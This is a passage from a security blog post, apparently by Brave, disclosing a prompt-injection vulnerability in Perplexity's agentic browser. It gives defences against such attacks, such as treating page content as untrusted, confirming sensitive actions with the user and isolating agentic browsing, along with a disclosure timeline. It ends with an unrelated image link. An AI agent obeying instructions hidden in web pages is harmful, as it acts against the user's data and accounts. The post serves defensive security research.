untrusted page contents, its output must be treated as potentially unsafe. The model should check user-alignment for tasks Based upon the task and the context, the model comes up with actions for the browser to take; these actions should be treated as “potentially unsafe” and should be independently checked for alignment against the user’s requests. This is related to the previous point about differentiating between the user’s requests (trusted) and the contents of the page (always untrusted). Security and privacy sensitive actions should require user interaction No matter the prior agent plan and tasks, the model should require explicit user interaction for security and privacy-sensitive tasks. For example: sending an email should always prompt the user to confirm right before the email is sent, and an agent should never automatically click through a TLS connection error interstitial. The browser should isolate agentic browsing from regular browsing Agentic browsing is an inherently powerful-but-risky mode for the user to be in, as this attack demonstrates. It should be impossible for the user to “accidentally” end up in this mode while casually browsing. Does the browser really need the ability to open your email account, send emails, and read sensitive data from every logged-in site if all you’re trying to do is summarize Reddit discussions? As with all things in the browser, permissions should be as minimal as possible. Powerful agentic capabilities should be isolated from regular browsing tasks, and this difference should be intuitively obvious to the user. This clean separation is especially important in these early days of agentic security, as browser vendors are still working out how to prevent security and privacy attacks. In future posts, we’ll cover more about how we are working towards a safer agentic browsing experience with fine-grained permissions. Disclosure timeline July 25, 2025: Vulnerability discovered and reported to Perplexity July 27, 2025: Perplexity acknowledged the vulnerability and implemented an initial fix July 28, 2025: Retesting revealed the fix was incomplete; additional details and comments were provided to Perplexity August 11, 2025: One-week public disclosure notice sent to Perplexity August 13, 2025: Final testing confirmed the vulnerability appears to be patched August 20, 2025: Public disclosure of vulnerability details (Update: on further testing after this blog post was released, we learned that Perplexity still hasn’t fully mitigated the kind of attack described here. We’ve re-reported this to them.) Research Motivation We believe strongly in raising the privacy and security bar across the board for agentic browsing. A safer Web is good for everyone. As we saw, giving an agent authority to act on the Web, especially within a user’s authenticated context, carries significant security and privacy risks. Our goal with this research is to surface those risks early and demonstrate practical defenses. This helps Brave, Perplexity, other browsers, and (most importantly) all users. We look forward to collaborating with Perplexity and the broader browser and AI communities on hardening agentic AI and, where appropriate, standardizing s...
![Google URL Shortener links will no longer be available [updated] - Google Developers Blog](https://rdl.ink/render/https%3A%2F%2Fstorage.googleapis.com%2Fgweb-developer-goog-blog-assets%2Fimages%2FGfD-Project-GameFace-blue_1.2e16d0ba.fill-1200x600.png?width=92&height=&ar=&mode=&format=avif&dpr=2)
